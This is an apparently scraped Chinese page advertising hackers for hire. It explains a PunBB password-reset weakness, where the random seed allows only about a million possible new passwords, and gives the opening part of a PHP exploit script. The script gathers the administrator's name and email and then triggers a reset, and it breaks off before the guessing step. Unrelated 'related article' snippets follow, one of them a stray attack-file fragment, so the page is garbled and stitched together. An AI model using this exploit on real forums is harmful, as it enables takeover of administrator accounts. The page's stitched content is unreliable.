怎么找 *** 黑客接单(24小时接单的黑客

访客3年前黑客资讯734

PunBB是一款基于PHP的论坛程序。 

PunBB的口令重置功能实现上存在漏洞,远程攻击者可能利用此漏洞在特定条件重置用户的口令。 
如果用户忘记了口令的话,可使用PunBB的口令重置功能重置。在请求口令重置后,论坛会向用户发送一封邮件,包含有一个新的随机口令以及激活链接,用户必须点击这个链接才能使口令更改生效。 
PunBB的口令重置功能使用mt_rand()生成新口令和激活链接,但在初始化马特赛特旋转演算法随机数生成器时使用了0到1,000,000之间的随机数,具体取决于当前的微秒,也就是只有100万个可能的新口令和激活链接。攻击者可以暴力猜测这个有限的区域,判断重置的口令并激活。 

<?php 
/** 
* Original : http://www.winshell.cn/2008-01.txt 
* Thanks to Stefan Esser, here's the exploit. 

* Team : EpiBite 
* firefox, petit-poney, thot 
* Nous tenons a remercier nos mamans et papas respectifs. 
* Let's get a fu*** coffee ! 
*/ 

// conf 
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url 
define('EMAIL', 'login_x@epitech.net'); // your email 
define('LOGIN', 'login_x'); // your login 
define('PASS', '620553.8I73'); // your pass 
// Exploit 
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, 
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
$s = curl_exec($h); 
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)', $s, $m); 
define('ADMIN', $m[2]); 
preg_match('/

([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m); 
if (count($m)) 
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1])); 
else 
define('DATE', time() - 86400); //just in case, the forum or account just has been created 
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); 
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($h, CURLOPT_HEADER, 1); 
curl_setopt($h, CURLOPT_POST, 1); 
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 
'req_email='.urlencode(EMAIL), 
'request_pass=Envoyer'))); 
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); 
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem) 
printf("Admin mail : %s\n--\n", ADMIN_MAIL); 

相关文章

12年伦敦奥运会(12年伦敦奥运会闭幕式)

北京时间8月13日凌晨,2012年第30届伦敦奥运会闭幕式在伦敦碗隆重举行,来自各国各地区的运动员、教练员和来宾再次聚集在伦敦碗,共同庆祝伦敦奥运会取得圆满。 泡泡眼乐队《Wonderwall》Jam...

企业如何构造自己的营销型网站?

企业按照网络经济发展的要求而在网络上建立了不同类型的网站,用以推广自己的产品或企业本身,那么其中有一种网站形式就是营销型网站。说到营销型网站是企业为了满足自身网络营销而建立的网站,一般包括以客户服务为...

黑客代码壁纸,找黑客改绩点风险大吗,去哪里找黑客

# cp CVE-2019-0199_POC.rtf /var/www/html/word/ windows/foreign/reverse_dns_txt$html.= 'User Id ';...

关键词策略,搜索引擎关键词优化注意事项!

关键词策略,搜索引擎关键词优化注意事项!

对付任何网站,它应该有一个完整的要害字计策。你不能依靠一个或几个要害词来得到流量,这是不现实的。因此,您需要不绝扩展有代价的要害词矩阵,并将其纳入网站内容建树的计策中。 就搜索引擎的要害词优化而言,从...

我女朋友把他的QQ聊天记录删除了

夏季天气炎热,给辅食妈妈带来了很多新的难题,不爱吃辅食,消化不良,腹泻等问题的出现,不吃辅食又容易引发营养不足,发育迟缓等,夏季怎么让宝宝吃得香长得棒?夏季辅食怎么挑选?下面友谊长存带来介绍。 夏季...

【HTB系列】 靶机Swagshop的渗透测试详解

【HTB系列】 靶机Swagshop的渗透测试详解

     总结与反思   使用   magento漏洞的利用   magescan 工具的使用   靶机介绍      靶机I...